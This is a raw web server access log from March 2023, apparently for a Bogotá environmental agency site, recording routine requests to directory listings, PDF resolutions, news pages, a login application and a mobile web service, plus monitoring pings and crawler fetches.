190.27.190.227 - - [26/Mar/2023:11:48:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/I6/VGu0e0TG6z2SYFIvAZPGshu8Ekpa/xNQRhJS2J43Q+EmgoMZEWwlK7SwsMNoxjXGU6Ot9pYlP8ffKfgog2qBxE8qg2UQE3t2sdoaeNIGkDmvz/Bnk42Epnr8urKeC5RQpTiHR4roEBuH+vyl5Lyf8LbsZB2Dm9vNg+1Gl+Mv+GkAK3LY3zbqImYfSTi2WXRDv0r7ciZ6qJavsOvBBQsQf73g4stsafq/eEBdFd4Xd20AsxNwFuJN0Vw3KjeO6e4PkQd6O7I9WGFKZsPdC8NnahgPCTwtWTMjAvcz65FkJtCIHDGe80a3nvaN+UI+UmE9o6MkegBS9WrADbW//k2k9XMByWNfvbUTVY/LQTgUxkcl32AN2/2txpuqKfAELFWa85lEaDukmwiEnYDu0hmFJbEeBFDbMdFlrD1dv+12HSaz6WsMCxFLTbHtsf9Iy5A9/wa1ebdZZZFGCZe2ZP/S/RduWMc3bW4ImRnvZLVGXA53yc5nyWAbny33RheHDHmxiDsjOWqDwDI/j18E1bpk2SItfkdJAhoy95YCTstSfXMm5Hr8YPfPPDaRQnbnP5Zf8awUveUr5ExLywrqbZchJGe9tPsr7/INqSoKMUAgs+qMt9I7Vl6TpklIG/nwLF7Q56wcBqs2AZxiJBzf7vL1ZmB3wHfo6tMh77h1mdksvfyhC0ASPUToNBYIAAyJwKqIPwgY422qwkSrrNAnN/mOPE9y0HGHHCJNzsOT8WQ7Jqc7A4HIZOMkjBgdyE0p4qoH0J2ijBN6I9lWxA7ASpolaBP03afBoE62qpSsnyPMVFnbKCV38z7BvprvRHDPYhhkjoyibTkDDh6Xp6YwO+fqsiNRpkK4KFY2Wd5+U//Rai8BzSc9SDdIQRCLIzBlHRSpxNGijv8Q6nuhnihGLqRduHjiLUPeGw4te5VmahwIdkvTlhCPk44aHbUUfgcrjjMWBviJ8coLNuixhCX2YyULpwWJv3GPz9d3LGcsvxGAubZjgq5bPg9hAIYBxGxRlVjjAcB9dPrUExOAZ8itZRgcwV3mliITVFrHwR4IbxiZ/AsFPlGzxduL5PQGn1YDX6ayfE/p5uGE2K3v5ciDNAnLJeXm9CVKR2XhYhkonYCtS35q/PwmRoWX4BD4NVRIYLQMZBkIXiPjUefUCcXpkjb6viG0Q8cvWxhteAE03HEadVaBUUOBeSWQ+s/pHYuHdY0mAcXuoSUs65zJEjjYbnWU/yfq0/XYhXcO9qEZ8IHQAIjTqK7+uLhKCvg+9HrD0xveZpCDHZoUjM9n4/vAU2VaXc+Vxu/j5j85ND85Xlg7zwOpudfiHTdeGvE04Fj2xJ7X1hlCiDWt6Dv9K4vNJPPsE64Z0OAQFBXBiq8soa9X16aNgCXHQrmG3Od5mQvp4n9zusfc9nNwXXslInhudnVxMMLpK8W7QfdlRtdV83HIJ9K0aGdblqhZuFKZBXfn3juk/ZRKKcXtcgXHJGggrXttgwf1zdYJKT9a55i4da/uV1azWsgHsnTLR8DU5PxOqLb1zGwK36kChfvc9TTFuoJXF3v5A432A=&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 26
190.27.190.227 - - [26/Mar/2023:11:48:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18+thaTTeL8kloJ7wNmfKzgAQgheiHLgtcbWeUzRXLz6Yk6Os0KRO/Q/UW5LnVuAnmv1/B7MMJh5guk7ZeS6perEJ+cM9EVW4hCQ8tER85BxZQvf7WPO2XXnYIYy4noc7XFkxfiecj2stZfaRVUkDdJ50pKVIzYCmU=&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 26
190.27.190.227 - - [26/Mar/2023:11:48:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19OBcSxn1QloW998MsKEvPSy6Ran3MYBaFz8s44C5GD5GvlWiC+2c3lRnh0Hj6PqIGDKYBmBa2khJ6ahjevefxAztdkC/fxQwGdz6VCU4zTN+/8KmNEd23QVhkWXmzw0SeHFPNqJmGK/rpKYb6q9AoWUEqypq+EpeY=&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 26
190.27.190.227 - - [26/Mar/2023:11:48:19 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/BpCoa5F6SRD4m+7OMwY5sYt0f6U5uuoTILaBpgf5llgdlOMMF2eJDLAACB88MAGv4KlNHl2wBEwFuldAgjfvCC31w3GC5Uha4hWSdPKVcI/eFZedansS1dFIgMi8vbzt+Lj4bkyDTSA3x2ISfW7ElAD/ZPFKsaX0=&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 26
190.27.190.227 - - [26/Mar/2023:11:48:20 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18ShaXS1Nm0v1Vzh7rSuqeHWqn/QW8cI+orfeT4m0c2XMfKhHQfPwaAJjjUXThM8WoaMPCIksKGAC87DM0KTHU+VE+aCtNSQF9lPHsscAkjtERzSGRoYGWaCwo/B6ZSO8aI41jAiv1KBTcKilHOn+whvhdUBuc7+imM4XeIspP3h3Zw6QYtRuwa2N8Zc20IsAQpvt97MZhpfA==&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 26
190.27.190.227 - - [26/Mar/2023:11:48:20 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/dHes5lZJgqVw6RNdLLjNGXq2GiO7Dl28uLO7mmi8xC3Dnnu7vuLCARKWEaeI/UjXlmpGjljw/ifq/D+MVVtJvakDD8YPKWz4TIkfwHbvjo8jx06liMGur1qPy0uUiq0pyN5JwGco5S7hdOasVJtP2+jc1RdDIq7AZ5C8rcUTIq7GF7n2ZVDfibP2aokr36TuSk4TOL7r00Q==&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 26
190.27.190.227 - - [26/Mar/2023:11:48:20 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX199GKE11R81LTxvofnRwgxFdbf/EOBrJwBE6TTKo3IKwnHvN+kKRLwV5QI04H8LLmSUiQ0kfhE4JOvaIvJ8ZIbX6DMD5/lPEz4h85ibimBQtiIUnlWTkM3F0YjLUwvKcaKcu7LhN/l+Gegf211LsYr7jzax4Qu03xqCNpaNq+mYSo7jY35vNQ3j&u=U2FsdGVkX1/yCZWn8gNjA84QOhWkvAX1Oz1PaGo86CfjMHar0oAm8lIprGDfjJAr&y=U2FsdGVkX19btboNEvjQPVXG4yIaOGzgmNcqGx4NQZ1RNEV+DvG0E+NpeLdmqYAk HTTP/1.1" 200 26
181.53.13.252 - - [26/Mar/2023:11:49:05 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 359935
192.168.175.240 - - [26/Mar/2023:11:49:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:11:48:13 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [26/Mar/2023:11:49:54 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:11:50:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:50:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
172.22.2.4 - - [26/Mar/2023:11:49:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
181.53.13.252 - - [26/Mar/2023:11:51:13 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
192.168.175.240 - - [26/Mar/2023:11:51:18 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:11:51:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
181.53.13.252 - - [26/Mar/2023:11:51:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
181.53.13.252 - - [26/Mar/2023:11:52:02 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 359935
192.168.175.240 - - [26/Mar/2023:11:52:18 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:11:53:18 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:11:54:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:54:22 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
52.167.144.43 - - [26/Mar/2023:11:54:43 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [26/Mar/2023:11:54:54 -0500] "HEAD / HTTP/1.1" 200 -
181.53.13.252 - - [26/Mar/2023:11:54:54 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 328362
192.168.175.240 - - [26/Mar/2023:11:55:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:11:54:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:11:56:18 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:11:56:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
181.53.13.252 - - [26/Mar/2023:11:56:33 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
172.22.2.4 - - [26/Mar/2023:11:54:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
181.53.13.252 - - [26/Mar/2023:11:56:51 -0500] "GET /BLA/resoluciones/AUTOS%202017/0760.pdf HTTP/1.1" 200 3179674
192.168.175.240 - - [26/Mar/2023:11:57:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:57:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:11:58:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:58:37 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:11:59:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:11:59:26 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
216.245.221.92 - - [26/Mar/2023:11:59:54 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:12:00:18 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:12:01:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:12:01:19 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
201.245.192.253 - - [26/Mar/2023:12:01:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
172.22.2.4 - - [26/Mar/2023:11:59:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.111.116 - - [26/Mar/2023:12:01:47 -0500] "GET /images/calidad-aire-2-marzo-1_optimized.jpeg HTTP/1.1" 200 51562
173.252.111.1 - - [26/Mar/2023:12:01:49 -0500] "GET /images/idpyba-4-marzo-1_optimized.jpeg HTTP/1.1" 200 115318
173.252.111.3 - - [26/Mar/2023:12:01:49 -0500] "GET /images/calidad-del-aire-suroccidental_optimized.jpeg HTTP/1.1" 200 175446
173.252.111.119 - - [26/Mar/2023:12:01:49 -0500] "GET /images/empresas-alertas_optimized.jpeg HTTP/1.1" 200 142365
173.252.111.119 - - [26/Mar/2023:12:01:49 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
173.252.111.12 - - [26/Mar/2023:12:01:49 -0500] "GET /images/28%20de%20febrero%20operativo.jpeg HTTP/1.1" 200 62220
181.53.13.252 - - [26/Mar/2023:12:01:57 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:12:02:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:12:00:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
173.252.95.117 - - [26/Mar/2023:12:02:46 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 206 1065
173.252.95.3 - - [26/Mar/2023:12:02:47 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 206 1065
181.53.13.252 - - [26/Mar/2023:12:02:49 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
173.252.95.19 - - [26/Mar/2023:12:02:49 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 206 1065
192.168.175.240 - - [26/Mar/2023:12:03:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:12:03:24 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
181.53.13.252 - - [26/Mar/2023:12:03:48 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
181.53.13.252 - - [26/Mar/2023:12:04:08 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:12:04:18 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [26/Mar/2023:12:04:47 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2023%2F HTTP/1.1" 200 10548
181.53.13.252 - - [26/Mar/2023:12:04:47 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
186.29.231.130 - - [26/Mar/2023:12:04:51 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-el-inicio-de-la-tercera-fase.html HTTP/1.1" 200 954
216.245.221.92 - - [26/Mar/2023:12:04:54 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:12:05:18 -0500] "GET / HTTP/1.1" 200 4720
66.249.79.111 - - [26/Mar/2023:12:05:29 -0500] "-" 408 -
181.53.13.252 - - [26/Mar/2023:12:05:43 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
181.53.13.252 - - [26/Mar/2023:12:06:05 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:12:06:18 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:12:06:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
181.53.13.252 - - [26/Mar/2023:12:06:29 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
192.168.175.240 - - [26/Mar/2023:12:07:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:12:07:23 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
172.22.2.4 - - [26/Mar/2023:12:05:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.220.149.4 - - [26/Mar/2023:12:07:27 -0500] "GET /images/cr\xc3\xb3nica-29-nov-1_optimized.jpeg HTTP/1.1" 404 1034
181.53.13.252 - - [26/Mar/2023:12:08:07 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
172.22.2.4 - - [26/Mar/2023:12:06:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
192.168.175.240 - - [26/Mar/2023:12:08:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:12:08:35 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
200.58.250.143 - - [26/Mar/2023:12:08:37 -0500] "GET / HTTP/1.1" 200 319
181.53.13.252 - - [26/Mar/2023:12:09:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:12:09:18 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [26/Mar/2023:12:09:54 -0500] "HEAD / HTTP/1.1" 200 -
181.53.13.252 - - [26/Mar/2023:12:10:08 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:12:10:18 -0500] "GET / HTTP/1.1" 200 4720
181.53.13.252 - - [26/Mar/2023:12:10:59 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 449478
192.168.175.240 - - [26/Mar/2023:12:11:18 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.71 - - [26/Mar/2023:12:11:23 -0500] "GET /BLA/resoluciones/AUTOS%202021/4247.pdf HTTP/1.1" 304 -
201.245.192.253 - - [26/Mar/2023:12:11:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
181.53.13.252 - - [26/Mar/2023:12:11:52 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2017%2F HTTP/1.1" 200 464237
192.168.175.240 - - [26/Mar/2023:12:12:18 -0500] "GET / HTTP/1.1" 200 4720
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12179
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:47 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:48 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:48 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:48 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:58 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.80.52.163 - - [26/Mar/2023:12:12:58 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:59 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12179
186.80.52.163 - - [26/Mar/2023:12:12:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:59 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:59 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:59 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:59 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:12:59 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:06 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2216
186.80.52.163 - - [26/Mar/2023:12:13:06 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:08 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 2229
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16231
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:14 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:14 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.80.52.163 - - [26/Mar/2023:12:13:14 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
172.22.2.4 - - [26/Mar/2023:12:11:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.80.52.163 - - [26/Mar/2023:12:13:16 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:16 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
192.168.175.240 - - [26/Mar/2023:12:13:18 -0500] "GET / HTTP/1.1" 200 4720
186.80.52.163 - - [26/Mar/2023:12:13:17 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 64904
186.80.52.163 - - [26/Mar/2023:12:13:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.52.163 - - [26/Mar/2023:12:13:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
172.22.2.4 - - [26/Mar/2023:12:12:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [26/Mar/2023:12:14:18 -0500] "GET / HTTP/1.1" 200 4720
157.55.39.218 - - [26/Mar/2023:12:14:51 -0500] "GET /incendios-forestales-como-prevenirlos-y-aportar-al-cuidado-de-los-ecosistemas.html HTTP/1.1" 200 883
216.245.221.92 - - [26/Mar/2023:12:14:54 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:12:15:18 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [26/Mar/2023:12:16:18 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [26/Mar/2023:12:16:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
200.118.62.198 - - [26/Mar/2023:12:16:41 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
192.168.175.240 - - [26/Mar/2023:12:17:18 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.71 - - [26/Mar/2023:12:17:29 -0500] "GET /bla/resoluciones/resoluciones%202022/0313.pdf HTTP/1.1" 304 -
192.168.175.240 - - [26/Mar/2023:12:18:18 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [26/Mar/2023:12:17:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [26/Mar/2023:12:19:18 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.71 - - [26/Mar/2023:12:19:44 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12501
216.245.221.92 - - [26/Mar/2023:12:19:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [26/Mar/2023:12:18:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
